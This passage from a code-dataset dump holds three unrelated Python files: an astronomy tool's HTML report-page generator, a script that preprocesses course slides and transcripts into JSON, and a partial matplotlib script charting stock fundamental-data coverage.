pts.modeling.html.datacubes import DatacubesPageGenerator\nfrom pts.modeling.html.fluxes import FluxesPageGenerator\nfrom pts.modeling.html.images import ImagePageGenerator\nfrom pts.modeling.html.attenuation import AttenuationPageGenerator\nfrom pts.modeling.html.colours import ColoursPageGenerator\nfrom pts.modeling.html.heating import HeatingPageGenerator\nfrom pts.core.basics.log import log\nfrom ..component.galaxy import GalaxyModelingComponent\nfrom ..core.progression import create_modeling_progression\nfrom ...core.tools import browser\n\n# -----------------------------------------------------------------\n\nclass AllPagesGenerator(GalaxyModelingComponent):\n\n \"\"\"\n This function ...\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n\n \"\"\"\n This function ...\n \"\"\"\n\n # Call the constructor of the base class\n super(AllPagesGenerator, self).__init__(*args, **kwargs)\n\n # The modeling progression to use to generate the pages\n self.progression = None\n\n # -----------------------------------------------------------------\n\n def run(self, **kwargs):\n\n \"\"\"\n This function ...\n :param kwargs:\n :return:\n \"\"\"\n\n # 1. Setup\n self.setup(**kwargs)\n\n # 2. Generate the index page\n if self.has_properties: self.generate_index()\n\n # 3. Generate the status page\n self.generate_status()\n\n # 4. Generate the data page\n if self.has_images: self.generate_data()\n\n # 5. Generate the preparation page\n if self.has_prepared: self.generate_preparation()\n\n # 6. Generate the components page\n if self.has_components: self.generate_components()\n\n # 7. Generate the photometry page\n if self.has_photometry: self.generate_photometry()\n\n # 8. Generate the maps page, if maps are chosen to construct a model\n if self.has_model: self.generate_maps()\n\n # 9. GEnerate the model page\n if self.has_fitting_run: self.generate_model()\n\n # 10. Generate the fitting page\n if self.has_generation: self.generate_fitting()\n\n # 11. Generate the datacubes page\n if self.has_datacubes: self.generate_datacubes()\n\n # 12. Generate the fluxes page\n if self.has_fluxes: self.generate_fluxes()\n\n # 13. Generate the images page\n if self.has_model_images: self.generate_images()\n\n # 14. Generate the attenuation page\n if self.has_attenuation: self.generate_attenuation()\n\n # 15. Generate the colours page\n if self.has_colours: self.generate_colours()\n\n # 16. Generate the heating page\n if self.has_heating: self.generate_heating()\n\n # 17. Write\n self.write()\n\n # 18. Show\n if self.config.show: self.show()\n\n # -----------------------------------------------------------------\n\n @property\n def has_properties(self):\n\n \"\"\"\n This function ...\n :return:\n \"\"\"\n\n return self.history.finished(\"fetch_properties\")\n\n # -----------------------------------------------------------------\n\n @property\n def has_images(self):\n\n \"\"\"\n This function ...\n :return:\n \"\"\"\n\n return self.history.finished(\"fetch_images\")\n\n # -----------------------------------------------------------------\n\n @property\n def has_prepared(self):\n\n \"\"\"\n This function ...\n :return:\n \"\"\"\n\n return self.history.finished(\"prepare_data\")\n\n # -----------------------------------------------------------------\n\n @property\n def has_components(self):\n\n \"\"\"\n This function ...\n :return:\n \"\"\"\n\n return self.history.finished(\"decompose\")\n\n # -----------------------------------------------------------------\n\n @property\n def has_photometry(self):\n\n \"\"\"\n This function ...\n :return:\n \"\"\"\n\n return self.history.finished(\"photometry\")\n\n # -----------------------------------------------------------------\n\n @property\n def has_model(self):\n\n \"\"\"\n This function ...\n :return:\n \"\"\"\n\n return self.history.finished(\"build_model\")\n\n # -----------------------------------------------------------------\n\n @property\n def has_fitting_run(self):\n\n \"\"\"\n This function ...\n :return:\n \"\"\"\n\n return self.history.finished(\"configure_fit\")\n\n # -----------------------------------------------------------------\n\n @property\n def has_generation(self):\n\n \"\"\"\n This function ...\n :return:\n \"\"\"\n\n return self.history.finished(\"fit_sed\")\n\n # -----------------------------------------------------------------\n\n @property\n def has_datacubes(self):\n\n \"\"\"\n This function ...\n :return:\n \"\"\"\n\n return self.history.finished(\"launch_analysis\")\n\n # -----------------------------------------------------------------\n\n @property\n def has_fluxes(self):\n\n \"\"\"\n This function ...\n :return:\n \"\"\"\n\n return self.history.finished(\"launch_analysis\")\n\n # -----------------------------------------------------------------\n\n @property\n def has_model_images(self):\n\n \"\"\"\n This function ....\n :return:\n \"\"\"\n\n return self.history.finished(\"launch_analysis\")\n\n # -----------------------------------------------------------------\n\n @property\n def has_attenuation(self):\n\n \"\"\"\n This function ...\n :return:\n \"\"\"\n\n return self.history.finished_any(\"analyse_attenuation_map\", \"analyse_attenuation_curve\")\n\n # -----------------------------------------------------------------\n\n @property\n def has_colours(self):\n\n \"\"\"\n This function ...\n :return:\n \"\"\"\n\n return self.history.finished(\"analyse_colours\")\n\n # -----------------------------------------------------------------\n\n @property\n def has_heating(self):\n\n \"\"\"\n This function ...\n :return:\n \"\"\"\n\n return self.history.finished_any(\"analyse_cell_heating\", \"analyse_projected_heating\")\n\n # -----------------------------------------------------------------\n\n def setup(self, **kwargs):\n\n \"\"\"\n This function ...\n :param kwargs:\n :return:\n \"\"\"\n\n # Call the setup function of the base class\n super(AllPagesGenerator, self).setup(**kwargs)\n\n # Create the progression\n if \"progression\" in kwargs: self.progression = kwargs.pop(\"progression\")\n else: self.create_progression()\n\n # -----------------------------------------------------------------\n\n def create_progression(self):\n\n \"\"\"\n This function ...\n :return:\n \"\"\"\n\n # Inform the user\n log.info(\"Creating the modeling progression ...\")\n\n # Create\n self.progression = create_modeling_progression(self.config.path)\n\n # -----------------------------------------------------------------\n\n def generate_index(self):\n\n \"\"\"\n This function ...\n :return:\n \"\"\"\n\n # Inform the user\n log.info(\"Generating the index page ...\")\n\n # Generate\n # 'generate_index_page'\n generator = IndexPageGenerator()\n generator.config.path = self.config.path\n generator.config.replot = self.config.replot\n generator.run()\n\n # -----------------------------------------------------------------\n\n def generate_status(self):\n\n \"\"\"\n This function ...\n :return:\n \"\"\"\n\n # Inform the user\n log.info(\"Generating the status page ...\")\n\n # Generate\n # 'generate_status_page'\n generator = StatusPageGenerator()\n generator.config.path = self.config.path\n generator.config.replot = self.config.replot\n generator.run()\n\n # -----------------------------------------------------------------\n\n def generate_data(self):\n\n \"\"\"\n This function ...\n :return:\n \"\"\"\n\n # Inform the user\n log.info(\"Generating the data page ...\")\n\n # Generate\n # 'generate_data_page'\n generator = DataPageGenerator()\n generator.config.path = self.config.path\n generator.config.replot = self.config.replot\n generator.run()\n\n # -----------------------------------------------------------------\n\n def generate_preparation(self):\n\n \"\"\"\n This function ...\n :return:\n \"\"\"\n\n # Inform the user\n log.info(\"Generating the preparation page ...\")\n\n # Generate\n # 'generate_preparation_page'\n generator = PreparationPageGenerator()\n generator.config.path = self.config.path\n generator.config.replot = self.config.replot\n generator.run()\n\n # -----------------------------------------------------------------\n\n def generate_components(self):\n\n \"\"\"\n This function ...\n :return:\n \"\"\"\n\n # Inform the user\n log.info(\"Generating the components page ...\")\n\n # Generate\n # 'generate_components_page'\n generator = ComponentsPageGenerator()\n generator.config.path = self.config.path\n generator.config.replot = self.config.replot\n generator.run()\n\n # -----------------------------------------------------------------\n\n def generate_photometry(self):\n\n \"\"\"\n This function ...\n :return:\n \"\"\"\n\n # Inform the user\n log.info(\"Generating the photometry page ...\")\n\n # Generate\n # 'generate_photometry_page'\n generator = PhotometryPageGenerator()\n generator.config.path = self.config.path\n generator.config.replot = self.config.replot\n generator.run()\n\n # -----------------------------------------------------------------\n\n def generate_maps(self):\n\n \"\"\"\n This function ...\n :return:\n \"\"\"\n\n # Inform the user\n log.info(\"Generating the maps page ...\")\n\n # Generate the maps page\n # 'generate_maps_page'\n generator = MapsPageGenerator()\n generator.config.path = self.config.path\n generator.config.replot = self.config.replot\n generator.config.model_name = self.progression.model_name\n generator.run()\n\n # -----------------------------------------------------------------\n\n def generate_model(self):\n\n \"\"\"\n This function ...\n :return:\n \"\"\"\n\n # Inform the user\n log.info(\"Generating the model page ...\")\n\n # Generate the model page\n # 'generate_model_page'\n generator = ModelPageGenerator()\n generator.config.path = self.config.path\n generator.config.replot = self.config.replot\n generator.config.fitting_run = self.progression.fitting_run_name\n generator.run()\n\n # -----------------------------------------------------------------\n\n def generate_fitting(self):\n\n \"\"\"\n This function ...\n :return:\n \"\"\"\n\n # Inform the user\n log.info(\"Generating the fitting page ...\")\n\n # Generate the fitting page\n # 'generate_fitting_page'\n generator = FittingPageGenerator()\n generator.config.path = self.config.path\n generator.config.replot = self.config.replot\n generator.config.fitting_run = self.progression.fitting_run_name\n generator.run()\n\n # -----------------------------------------------------------------\n\n def generate_datacubes(self):\n\n \"\"\"\n This function ...\n :return:\n \"\"\"\n\n # Inform the user\n log.info(\"Generating the datacubes page ...\")\n\n # Generate the datacubes page\n # 'generate_datacubes_page'\n generator = DatacubesPageGenerator()\n generator.config.path = self.config.path\n generator.config.replot = self.config.replot\n generator.run()\n\n # -----------------------------------------------------------------\n\n def generate_fluxes(self):\n\n \"\"\"\n This function ...\n :return:\n \"\"\"\n\n # Generate the fluxes page\n # 'generate_fluxes_page'\n generator = FluxesPageGenerator()\n generator.config.path = self.config.path\n generator.config.replot = self.config.replot\n generator.run()\n\n # -----------------------------------------------------------------\n\n def generate_images(self):\n\n \"\"\"\n This function ...\n :return:\n \"\"\"\n\n # Generate the images page\n # 'generate_images_page'\n generator = ImagePageGenerator()\n generator.config.path = self.config.path\n generator.config.replot = self.config.replot\n generator.run()\n\n # -----------------------------------------------------------------\n\n def generate_attenuation(self):\n\n \"\"\"\n This function ...\n :return:\n \"\"\"\n\n # Inform the user\n log.info(\"Generating the attenuation page ...\")\n\n # Generate the attenuation page\n # 'generate_attenuation_page'\n generator = AttenuationPageGenerator()\n generator.config.path = self.config.path\n generator.config.replot = self.config.replot\n generator.config.analysis_run = self.progression.analysis_run_name\n generator.run()\n\n # -----------------------------------------------------------------\n\n def generate_colours(self):\n\n \"\"\"\n This function ...\n :return:\n \"\"\"\n\n # Inform the user\n log.info(\"Generating the colours page ...\")\n\n # Generate the colours page\n # 'generate_colours_page'\n generator = ColoursPageGenerator()\n generator.config.path = self.config.path\n generator.config.replot = self.config.replot\n generator.config.analysis_run = self.progression.analysis_run_name\n generator.run()\n\n # -----------------------------------------------------------------\n\n def generate_heating(self):\n\n \"\"\"\n This function ...\n :return:\n \"\"\"\n\n # Inform the user\n log.info(\"Generating the heating page ...\")\n\n # Generate the heating page\n # 'generate_heating_page'\n generator = HeatingPageGenerator()\n generator.config.path = self.config.path\n generator.config.replot = self.config.replot\n generator.config.analysis_run = self.progression.analysis_run_name\n generator.run()\n\n # -----------------------------------------------------------------\n\n def write(self):\n\n \"\"\"\n This function ...\n :return:\n \"\"\"\n\n # Inform the user\n log.info(\"Writing ...\")\n\n # -----------------------------------------------------------------\n\n def show(self):\n\n \"\"\"\n This function ...\n :return:\n \"\"\"\n\n # Inform the user\n log.info(\"Showing the pages ...\")\n\n # Open\n browser.open_path(self.environment.html_status_path)\n\n# -----------------------------------------------------------------\n","repo_name":"rag9704/PTS","sub_path":"modeling/html/all.py","file_name":"all.py","file_ext":"py","file_size_in_byte":16369,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"76"} +{"seq_id":"30388676338","text":"\n# coding: utf-8\n\n# In[70]:\n\n\nimport json\nimport os\nimport codecs\nfrom nltk.stem.wordnet import WordNetLemmatizer\nfrom nltk.stem.porter import *\nfrom pattern.en import parse\nimport nltk\nfrom nltk.corpus import stopwords\nimport numpy as np\nimport ast\n\nstemmer = PorterStemmer()\nlemmatizer = WordNetLemmatizer()\n\nverb_tags = ['VB', 'VBS','VBG','VBN','VBP','VBZ']\n\n\n# In[71]:\n\n\ndef read_file(filename):\n json_dict = {}\n with open(filename, 'r', encoding='utf8') as f:\n x = 0\n line = f.readline()\n while line != '':\n while line == '\\n':\n line = f.readline()\n line = line.split('\\n')[0]\n if line[0] == '\\f':\n for y in range(len(line)):\n if line[y] == '\\f':\n x += 1\n json_dict['slide' + str(x)] = {}\n else:\n break\n if line[1:] == '8/25/2016':\n f.readline()\n line = f.readline()\n json_dict['slide' + str(x)]['title'] = preprocess_string(line)\n else:\n json_dict['slide' + str(x)]['title'] = preprocess_string(line[1:])\n else:\n processed_string = preprocess_string(line)\n if x == 0:\n if line == '8/25/2016':\n f.readline()\n line = f.readline()\n processed_string = preprocess_string(line)\n json_dict['slide' + str(x)] = {}\n json_dict['slide' + str(x)]['title'] = processed_string\n else:\n if 'text' not in json_dict['slide' + str(x)]:\n json_dict['slide' + str(x)]['text'] = processed_string\n else:\n json_dict['slide' + str(x)]['text'] += processed_string\n line = f.readline()\n return json_dict\n\n\n# In[72]:\n\n\ndef read_transcript(slide_content):\n courses = ['bayesian-methods-in-machine-learning', 'cluster-analysis','cs-410',\n 'language-processing']\n for course in courses:\n with os.scandir('./slides_augmented_content/' + course) as it:\n for folder in it:\n if not folder.is_file():\n with os.scandir('./slides_augmented_content/' + course + '/' + folder.name) as transcript_folder:\n for entry in transcript_folder:\n if entry.is_file():\n if entry.name.lower().endswith('.txt'):\n try:\n with open(entry, 'r') as f:\n x = 1\n line = f.readline()\n slide_num = 'slide0'\n while line != '':\n if x % 2 == 1 and line != '\\n':\n slide_num = line.split('\\n')[0][:-4]\n elif x % 2 == 0:\n if entry.name in slide_content[course]:\n\n slide_content[course][entry.name][slide_num]['lecture_transcript'] = array2txt(ast.literal_eval(line))\n x += 1\n line = f.readline()\n except FileNotFoundError:\n continue\n print('Finished adding transcript for', entry)\n return slide_content\n\n\n# In[73]:\n\n\ndef array2txt(array):\n string = ''\n for word in array:\n string += (word + ' ')\n return preprocess_string(string[:-1])\n\n\n# Remove all stopwords and lemmatize all words in each line of the slide\n\n# In[74]:\n\n\ndef preprocess_string(string):\n result = ''\n string = string.lower()\n tokenized = nltk.word_tokenize(string)\n for x in range(len(tokenized)):\n if tokenized[x] not in stopwords.words('english'):\n parse_output = parse(tokenized[x], relations=True, lemmata=True).split(\"/\")\n result += parse_output[len(parse_output) - 1].strip() + ' '\n return result[:-1] + '\\n'\n\n\n# In[75]:\n\n\ndef get_course_json(path):\n course = {}\n with os.scandir(path) as it:\n for entry in it:\n if entry.is_file():\n course[entry.name] = read_file(entry)\n print('Finished converting file', entry.name)\n return course\n\n\n# In[76]:\n\n\ndef write_to_json(filename, data):\n with open(filename + '.json', 'w', encoding='utf8') as outfile:\n json.dump(data, outfile)\n\n\n# In[77]:\n\n\ndef main():\n courses = ['bayesian-methods-in-machine-learning', 'bayesian-statistics', 'cluster-analysis','cs-410',\n 'language-processing','ml-clustering-and-retrieval','recommender-systems-introduction', 'text-mining-analytics']\n courses_json = {}\n for course in courses:\n courses_json[course] = get_course_json('./pdftotext/' + course)\n courses_json = read_transcript(courses_json)\n write_to_json('courses_json_preprocessed', courses_json)\n\n\n# In[78]:\n\n\nmain()\n\n\n# In[79]:\n\n\ndef make_json_readable(jsonname, filename):\n data = {}\n with open(jsonname, 'r', encoding='utf8') as f:\n data = json.load(f)\n with open(filename, 'w', encoding='utf8') as f:\n f.write('')\n with open(filename, 'a', encoding='utf8') as f:\n for course in data:\n f.write(course + '{\\n')\n for lecture in data[course]:\n f.write('\\t' + lecture + '{\\n')\n for slide in data[course][lecture]:\n f.write('\\t\\t' + slide + '{\\n')\n for content in data[course][lecture][slide]:\n f.write('\\t\\t\\t' + content + ':' + data[course][lecture][slide][content] + '\\n')\n f.write('\\t\\t}\\n')\n f.write('\\t}\\n')\n f.write('}\\n')\n\n\n# In[80]:\n\n\nmake_json_readable('courses_json_preprocessed.json', 'readable_courses_preprocessed.txt')\n\n","repo_name":"Bhaavya/mooc-web-of-slides","sub_path":"preprocessing_code/txt2json.py","file_name":"txt2json.py","file_ext":"py","file_size_in_byte":6256,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"69800757365","text":"from libraries_and_constants import *\n\n# global variables\nlog = logging_utils.Log(LOG_FILEPATH)\n\nCHART_NAMES = [\n\t'Stock vs Quarter',\n\t'Metric vs Quarter',\n\t'Metric vs Stock',\n\t'Price Data Stock vs Day'\n]\n\n\n\ndef select_chart(\n\tnum_indents=0):\n\n\tuser_input = None\n\twhile user_input == None:\n\t\tlog.print('Select which chart to view:',\n\t\t\tnum_indents=num_indents,\n\t\t\tnew_line_start=True)\n\t\tlog.print('1) stock vs quarter', num_indents=num_indents+1)\n\t\tlog.print('2) metric vs quarter', num_indents=num_indents+1)\n\t\tlog.print('3) metric vs stock', num_indents=num_indents+1)\n\t\tlog.print('4) price data stock vs day', num_indents=num_indents+1)\n\t\tuser_input = input()\n\t\tif user_input not in ['1', '2', '3', '4']:\n\t\t\tuser_input = None\n\t\t\tlog.print('invalid input, valid inputs are [1, 2, 3, 4]',\n\t\t\t\tnum_indents=num_indents+1)\n\t\telse:\n\t\t\tbreak\n\n\tlog.print('Selected option %s: %s' % (user_input, CHART_NAMES[int(user_input) - 1]),\n\t\tnum_indents=num_indents)\n\treturn int(user_input)\ndef plot_stock_vs_quarter(\n\tverbose=False,\n\tnum_indents=0,\n\tnew_line_start=False):\n\t\n\tlog.print('plotting \\\"%s\\\" chart ...' % CHART_NAMES[0],\n\t\tnum_indents=num_indents, new_line_start=True)\n\n\twith open(METADATA_FILEPATH, 'r') as f:\n\t\tmetadata_dct = json.load(f)\n\tdf = pd.read_csv(\n\t\tQUALITY_REPORT_PATHS['stock_vs_quarter']['variable'],\n\t\tindex_col='cik')\n\n\tnum_stocks = int(metadata_dct['total_number_of_stocks'])\n\tquarters = metadata_dct['quarters_parsed']['quarters']\n\tearliest_quarter = quarters[0]\n\tlatest_quarter = quarters[-1]\n\tnum_quarters = int(metadata_dct['quarters_parsed']['count'])\n\tnum_variable_metrics = int(metadata_dct['number_of_metrics']['variable'])\n\n\n\tfig, ax = plt.subplots()#figsize=(12, 6.5))\n\tfig.canvas.manager.set_window_title(CHART_NAMES[0])\n\tfig.canvas.manager.window.showMaximized() # go fullscreen\n\tcmap = mcolors.LinearSegmentedColormap.from_list(\n\t\t'', ['red', 'orange', 'yellow', 'green'])\n\t# colormaps: https://matplotlib.org/devdocs/tutorials/colors/colormaps.html#list-colormaps\n\tnorm = mcolors.Normalize(vmin=0, vmax=num_variable_metrics)\n\tplot = ax.pcolormesh(df, cmap=cmap, norm=norm)\n\tax.set_title(\n\t\t'Data Coverage of %d variable metrics of %d Stocks over %d Quarters (%.2f Years)' % (\n\t\t\tnum_variable_metrics, num_stocks, num_quarters, (num_quarters / 4)),\n\t\tfontsize=14)\n\tax.set_ylabel('%d Stocks' % num_stocks)# (sorted from least to most coverage)' % num_stocks)\n\tax.set_yticks([])\n\tax.set_xlabel('Quarters')\n\tax.set_xticks(np.arange(0.5, len(df.columns), 1), df.columns, rotation=90) # Code C\n\n\t# legend\n\t# source: https://stackoverflow.com/questions/32462881/add-colorbar-to-existing-axis\n\tdivider = make_axes_locatable(ax)\n\tcax = divider.append_axes('right', size='5%', pad=0.10)\n\tcbar = fig.colorbar(\n\t\tplot,\n\t\tcax=cax,\n\t\torientation='vertical')\n\tcbar.ax.set_ylabel('Percent Data Coverage (out of %d variable metrics)' % num_variable_metrics, fontsize=12)\n\t# tick_locs = np.linspace(0, num_variable_metrics - 1, 5)\n\t# cbar.set_ticks(tick_locs)\n\t# cbar.ax.set_yticklabels(['0 %', '25 %', '50 %', '75 %', '100 %'])\n\n\tdef format_coord(x, y):\n\t\t# TO DO: fix this\n\t\t# if int(x) > len(quarters) or int(x) < 0: return ''\n\t\t# if int(y) > df.shape[0] or int(y) < 0: return ''\n\t\t# print(x, y, len(quarters), df.shape[0])\n\t\tq = quarters[int(x)]\n\t\tcik = df.iloc[int(y)].name\n\t\ts1 = 'quarter=%s' % q\n\t\ts2 = 'cik=%s' % cik\n\t\ts3 = '%d of %d variable metrics found' % (\n\t\t\tdf.at[cik, q], num_variable_metrics)\n\t\treturn '\\t'.join([s1, s2, s3])\n\tax.format_coord = format_coord\n\n\tfig.autofmt_xdate()\n\tfig.tight_layout()\n\tplt.show()\ndef plot_metric_vs_quarter(\n\tverbose=False,\n\tnum_indents=0,\n\tnew_line_start=False):\n\t\n\tlog.print('plotting \\\"%s\\\" chart ...' % CHART_NAMES[0],\n\t\tnum_indents=num_indents, new_line_start=True)\n\n\twith open(METADATA_FILEPATH, 'r') as f:\n\t\tmetadata_dct = json.load(f)\n\tdf = pd.read_csv(\n\t\tQUALITY_REPORT_PATHS['metric_vs_quarter']['variable'],\n\t\tindex_col='metric')\n\t# search_cols = list(filter(lambda c : c.split('-')[1] == 'searched', df.columns))\n\t# print(search_cols)\n\t# print(df[search_cols])\n\tquarters = list(set(map(lambda c : c.split('-')[0], df.columns)))\n\tquarters.sort()\n\t# print(quarters)\n\tvariable_metrics = df.index.tolist()\n\t# print(variable_metrics)\n\n\tfraction_df = pd.DataFrame(columns=quarters, index=df.index)\n\tfor q in quarters:\n\t\tfor m in variable_metrics:\n\t\t\tf, s = df.at[m, q+'-found'], df.at[m, q+'-searched']\n\t\t\tfraction_df.at[m, q] = '%s/%s' % (f, s)\n\tprint('\\n\\nFraction:')\n\tprint(fraction_df)\n\n\tpercent_df = pd.DataFrame(columns=quarters, index=df.index)\n\tfor q in quarters:\n\t\tfor m in variable_metrics:\n\t\t\tf, s = df.at[m, q+'-found'], df.at[m, q+'-searched']\n\t\t\tpercent_df.at[m, q] = '%.1f%%' % ((100.0 * f / s) if s != 0 else np.nan)\n\tprint('\\n\\nPercentage:')\n\tprint(percent_df)\n\t\t\t\n\tsys.exit()\n\tprint(percent_df)\n\tprint(len(percent_df.columns))\n\tprint(len(percent_df.columns) // 2)\n\tprint(len(percent_df.columns) // 2 + 1)\n\tsys.exit()\n\n\n\n\n\n\n\n\n\t# actual plot\n\n\tfor i in range(0, len(df.columns), 2):\n\t\tprint(i, i+1)\n\n\tnum_stocks = int(metadata_dct['total_number_of_stocks'])\n\tquarters = metadata_dct['quarters_parsed']['quarters']\n\tearliest_quarter = quarters[0]\n\tlatest_quarter = quarters[-1]\n\tnum_quarters = int(metadata_dct['quarters_parsed']['count'])\n\tnum_variable_metrics = int(metadata_dct['number_of_metrics']['variable'])\n\n\n\tfig, ax = plt.subplots()#figsize=(12, 6.5))\n\tfig.canvas.manager.set_window_title(CHART_NAMES[0])\n\tfig.canvas.manager.window.showMaximized() # go fullscreen\n\tcmap = mcolors.LinearSegmentedColormap.from_list(\n\t\t'', ['red', 'orange', 'yellow', 'green'])\n\t# colormaps: https://matplotlib.org/devdocs/tutorials/colors/colormaps.html#list-colormaps\n\tnorm = mcolors.Normalize(vmin=0, vmax=num_variable_metrics)\n\tplot = ax.pcolormesh(df, cmap=cmap, norm=norm)\n\tax.set_title(\n\t\t'Data Coverage of Fundamental Data of %d Variable Metrics over %d Quarters (%.2f Years)' % (\n\t\tnum_variable_metrics,\n\t\tnum_quarters,\n\t\t(num_quarters / 4)),\n\t\tfontsize=14)\n\tax.set_ylabel('%d Variable Metrics' % num_variable_metrics)\n\tax.set_yticks([])\n\tax.set_xlabel('Quarters')\n\tax.set_xticks(np.arange(0.5, len(df.columns), 1), df.columns)#, rotation=60) # Code C\n\n\t# legend\n\t# source: https://stackoverflow.com/questions/32462881/add-colorbar-to-existing-axis\n\tdivider = make_axes_locatable(ax)\n\tcax = divider.append_axes('right', size='5%', pad=0.10)\n\tcbar = fig.colorbar(\n\t\tplot,\n\t\tcax=cax,\n\t\torientation='vertical')\n\tcbar.ax.set_ylabel('Percent Data Coverage (out of %d variable metrics)' % num_variable_metrics, fontsize=12)\n\t# tick_locs = np.linspace(0, num_variable_metrics - 1, 5)\n\t# cbar.set_ticks(tick_locs)\n\t# cbar.ax.set_yticklabels(['0 %', '25 %', '50 %', '75 %', '100 %'])\n\n\tdef format_coord(x, y):\n\t\tq = quarters[int(x)]\n\t\tvar_m = df.iloc[int(y)].name\n\t\ts1 = 'quarter=%s' % q\n\t\ts2 = 'metric=%s' % var_m\n\t\ts3 = '%d of %d stocks found this metric' % (\n\t\t\tdf.at[var_m, q], num_stocks)\n\t\treturn '\\t'.join([s1, s2, s3])\n\tax.format_coord = format_coord\n\n\tfig.autofmt_xdate()\n\tfig.tight_layout()\n\tplt.show()\n\n\n\n''' plot_data_quality_report\n\tReturns:\n\t\tNone, it displays a plot showing the quality of the data for each quarter and each stock.\n\t\tThe plot is a grid with each quarter along the horizontal axis and each stock listed along the vertical axis.\n\t\tEach stock has fundamental data for SOME of the quarters. The stocks are sorted by the number of quarters they\n\t\thave data for. The stock with data for the most number of quarters is at the top and the stock with data for\n\t\tthe least number of quarters is at the bottom. For each quarter there are x fundamental data columns a stock\n\t\tcan have data for. If a stock has data on 100% of its values that cell in the grid is GREEN; if it has 0 that \n\t\tcell is RED, with a gradient inbetween depending on the percentage of data it has.\n\tArguments:\n\t\tverbose - boolean - print to the console if True\n\t'''\ndef plot_data_quality_report(\n\tchart_name,\n\tverbose=True,\n\tnum_indents=0,\n\tnew_line_start=False):\n\n\t# converts start and end quarters to proper end dates according to Google\n\t# Proper End Dates:\n\t# Q1 03/31\n\t# Q2 06/30\n\t# Q3 09/30\n\t# Q4 12/31\n\tdef proper_end_date(date_str):\n\t\ty, m, d = tuple(date_str.split('-'))\n\t\tif '01-01' <= '-'.join([m, d]) <= '03-31': (m, d) = ('03', '31')\n\t\tif '04-01' <= '-'.join([m, d]) <= '06-30': (m, d) = ('06', '30')\n\t\tif '07-01' <= '-'.join([m, d]) <= '09-30': (m, d) = ('09', '30')\n\t\tif '10-01' <= '-'.join([m, d]) <= '12-31': (m, d) = ('12', '31')\n\t\treturn '-'.join([y, m, d])\n\t# gets next proper quarter after date_str\n\tdef next_quarter(date_str):\n\t\ty, m, d = tuple(date_str.split('-'))\n\t\tif '-'.join([m, d]) == '03-31': return '-'.join([y, '06', '30'])\n\t\tif '-'.join([m, d]) == '06-30': return '-'.join([y, '09', '30'])\n\t\tif '-'.join([m, d]) == '09-30': return '-'.join([y, '12', '31'])\n\t\tif '-'.join([m, d]) == '12-31': return '-'.join([str(int(y)+1), '03', '31'])\n\t# creates list of proper quarters\n\tdef get_quarters(assets, verbose=True):\n\n\t\tif verbose: print('\\nGetting Quarter range ...')\n\n\t\t# create list of all quarters\n\t\t# from earliest to latest quarter of all the assets\n\t\tearliest_quarter = assets[list(assets.keys())[0]]['Quarter end'].min()\n\t\tlatest_quarter = assets[list(assets.keys())[0]]['Quarter end'].max()\n\t\tfor i, (ticker, df) in enumerate(assets.items()):\n\t\t\tif df.shape[0] == 0: continue\n\t\t\tlatest_quarter = df['Quarter end'].iloc[0] \\\n\t\t\t\tif df['Quarter end'].iloc[0] > latest_quarter else \\\n\t\t\t\t\tlatest_quarter\n\t\t\tearliest_quarter = df['Quarter end'].iloc[-1] \\\n\t\t\t\tif df['Quarter end'].iloc[-1] < earliest_quarter else \\\n\t\t\t\t\tearliest_quarter\n\n\t\t# convert start and end quarters to proper end dates according to Google\n\t\tearliest_quarter = proper_end_date(earliest_quarter)\n\t\tlatest_quarter = proper_end_date(latest_quarter)\n\n\t\t# create list of all quarters\n\t\tquarters = []\n\t\tq = earliest_quarter\n\t\twhile q <= latest_quarter:\n\t\t\tquarters.append(q)\n\t\t\tq = next_quarter(q)\n\t\tnum_quarters = len(quarters)\n\n\t\tif verbose:\n\t\t\tprint('Quarter Range aquired.')\n\t\t\tprint('\tearliest_quarter = %s' % earliest_quarter)\n\t\t\tprint('\tlatest_quarter = %s' % latest_quarter)\n\t\t\tprint('\tcovering %d quarters, aka %.2f years\\n' % (num_quarters, (num_quarters / 4)))\n\n\t\treturn quarters, num_quarters, earliest_quarter, latest_quarter\n\t# get data coverage percentage each quarter for each asset (in 2D array)\n\tdef calculate_data_coverage(assets, quarters, verbose=True, save=True):\n\n\t\tif verbose:\n\t\t\tprint('\\nCalculating data coverage for each asset for each quarter ...')\n\t\t\tstart_time = datetime.now()\n\t\tnumber_of_cols_in_dfs = set(map(lambda df : df.shape[1], list(assets.values())))\n\t\tif len(number_of_cols_in_dfs) != 1:\n\t\t\tprint('Not all the CSV files have the same number of columns.')\n\t\t\tprint('Number of columns in CSV files:' % number_of_cols_in_dfs)\n\t\t\tprint('Aborting creating data quality report.')\n\t\t\tsys.exit()\n\t\tx = list(number_of_cols_in_dfs)[0] - 1 # x = total number of fields (minus the \"Quarter end\" field)\n\t\tdata_coverage = {}\n\t\tbp = BlockPrinter()\n\t\tn = len(assets.keys())\n\t\tfor i, (ticker, df) in enumerate(assets.items()):\n\t\t\tif verbose:\n\t\t\t\tbp.print('Ticker %s:\\tasset %d out of %d, %.1f %% complete.' % (\n\t\t\t\t\tticker, (i+1), n, 100 * (i+1) / n))\n\t\t\tticker_data_coverage = []\n\t\t\tnumber_of_quarters_covered = 0\n\t\t\tticker_proper_quarters_series = df['Quarter end'].apply(lambda q : proper_end_date(q))\n\t\t\tfor q in quarters:\n\t\t\t\ttry:\n\t\t\t\t\tj = ticker_proper_quarters_series[ticker_proper_quarters_series == q].index[0]\n\t\t\t\texcept:\n\t\t\t\t\tj = None\n\t\t\t\t\tnumber_of_data_points_this_quarter = 0\n\t\t\t\tif j != None:\n\t\t\t\t\tquarter_series = df.iloc[j].drop(labels=['Quarter end'])\n\t\t\t\t\tnumber_of_data_points_this_quarter = \\\n\t\t\t\t\t\tquarter_series[quarter_series != 'None'].shape[0]\n\t\t\t\t\tnumber_of_quarters_covered += 1\n\n\t\t\t\tticker_data_coverage.append(number_of_data_points_this_quarter)\n\t\t\tdata_coverage[ticker] = (number_of_quarters_covered, ticker_data_coverage)\n\n\t\t# sort them by number_of_quarters_covered\n\t\tdata_coverage = OrderedDict(sorted(data_coverage.items(), key=lambda x : x[1]))\n\t\tdata_coverage_2D_array = [ticker_data_coverage for ticker, (number_of_quarters_covered, ticker_data_coverage) in data_coverage.items()]\n\n\t\tif save:\n\t\t\tjson.dump(data_coverage, open(PLOT_DATA_PATH, 'w'))\n\n\t\tif verbose:\n\t\t\tend_time = datetime.now()\n\t\t\tprint('Calculations complete. Duration: %.1f minutes\\n' % ((end_time - start_time).total_seconds() / 60.0))\n\n\t\treturn 